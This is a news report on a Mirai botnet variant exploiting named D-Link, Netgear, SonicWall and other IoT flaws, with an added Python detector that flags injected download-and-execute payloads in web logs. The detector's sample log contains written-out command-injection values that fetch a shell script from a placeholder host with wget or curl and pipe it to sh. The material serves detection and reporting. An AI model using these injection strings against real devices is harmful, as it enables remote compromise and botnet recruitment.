Palo Alto Networks’ Unit 42 reports a new Mirai variant that is targeting known flaws in D-Link, Netgear, and SonicWall devices, and yet to be discovered flaws in various internet-of-things (IoT) gadgets.
The new variant has been detected targeting six known vulnerabilities and three previously unknown ones to infect systems and enlist them in a botnet.
The campaign is still active at the time of this writing, said Palo Alto researchers on Monday.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” experts explain.
Attackers exploited the following six known vulnerabilities: a SonicWall SSL-VPN exploit; Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 and CVE-2021-27562); a D-Link DNS-320 firewall exploit (CVE-2020-25506); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); and a Netis WF2419 wireless router exploit (CVE-2019-19356).
Researchers also mention the attackers are targeting flaws in IoT devices that had not been previously identified.
“We cannot say with certainty what the targeted devices are for the unidentified exploits,” Zhibin Zhang, principal researcher for Unit 42, told Threatpost. “However, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.”
The researchers say the first two exploits are used in RCE attacks: one targets a command-injection vulnerability in certain components, and the other targets the Common Gateway Interface (CGI) login script, where the flaw stems from a key parameter that is not properly sanitized. The third exploit targets the op_type parameter, which is likewise not properly sanitized, leading to command injection.
After the initial stage, the malware invokes the wget utility to download a malicious shell script that then downloads several Mirai binaries (lolol.sh and dark.[arch]) and executes them.
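The infection chain above (a command injected into a request parameter that calls wget to fetch a shell script and run it) leaves a recognisable trace in web-server access logs. The following detector is an added example, not code from Unit 42 or Threatpost: it parses Common Log Format lines, URL-decodes each query parameter, and flags values that chain a download tool (wget, curl, tftp) into a shell. The log lines, IP addresses, paths and script names are constructed for illustration; the parameter names key and op_type are taken from the article's description.

```python
"""Flag web requests whose parameters carry a download-and-execute payload.

Added example (not Unit 42's or Threatpost's code). It scans access-log lines
for the pattern the article describes: a command injected into a request
parameter that invokes wget (or similar) to fetch a shell script and execute it.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log lines (Common Log Format). Addresses use
# documentation ranges; file names are placeholders, not real IoCs.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2021:12:00:02 +0000] "GET /cgi-bin/login.cgi?key=admin%3Bwget%20http%3A%2F%2F198.51.100.7%2Flolol.sh%20-O%20%2Ftmp%2Fl.sh%3Bsh%20%2Ftmp%2Fl.sh HTTP/1.1" 200 0
203.0.113.9 - - [10/Mar/2021:12:00:03 +0000] "POST /api/config?op_type=1%7Ccurl%20198.51.100.7%2Fdark.sh%7Csh HTTP/1.1" 500 0
198.51.100.20 - - [10/Mar/2021:12:00:04 +0000] "GET /download?file=report.pdf HTTP/1.1" 200 2048
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A shell metacharacter (or start of value) followed by a download utility ...
DOWNLOAD_RE = re.compile(r'(?:^|[;|&`$(])\s*(?:wget|curl|tftp)\b', re.IGNORECASE)
# ... and, somewhere in the same value, a chain or pipe into a shell interpreter.
EXEC_RE = re.compile(r'[;|&]\s*(?:sh|bash|busybox)\b', re.IGNORECASE)


def decode_params(target):
    """Return the decoded (name, value) pairs of a request target's query string."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes values, so %3B becomes ';' only after splitting.
    return parse_qsl(query, keep_blank_values=True)


def is_download_exec(value):
    """True when a parameter value both fetches a remote file and runs a shell."""
    return bool(DOWNLOAD_RE.search(value) and EXEC_RE.search(value))


def scan_log(text):
    """Return one hit per suspicious request: source IP, parameter name, payload."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        for name, value in decode_params(m.group("target")):
            if is_download_exec(value):
                hits.append({"ip": m.group("ip"), "param": name, "payload": value})
                break  # one hit per request is enough for alerting
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} injected via '{hit['param']}': {hit['payload']}")
```

Running the script prints the two constructed injection attempts and ignores the benign requests. Because the payload is decoded before matching, encoded separators such as %3B and %7C do not evade the rule; the two-part test (download tool plus shell execution) keeps ordinary parameter values that merely mention "curl" from firing.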
The variant in focus is the latest of more than 60 variants of malware based on Mirai’s source code that are behind an array of attacks. For example, last year, a Mirai variant targeted Zyxel network-attached storage (NAS) devices, security researchers say. In 2019, a variant of the botnet was found targeting flaws in enterprise wireless presentation and display systems. And, in 2018, a variant was used in DDoS campaigns against financial-sector businesses.
Researchers noted that connected devices continue to pose a serious security problem for users and strongly advised customers to apply patches as soon as manufacturers release them.
“The IoT realm remains an easily accessible target for attackers,” Unit 42 researchers said. “Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.”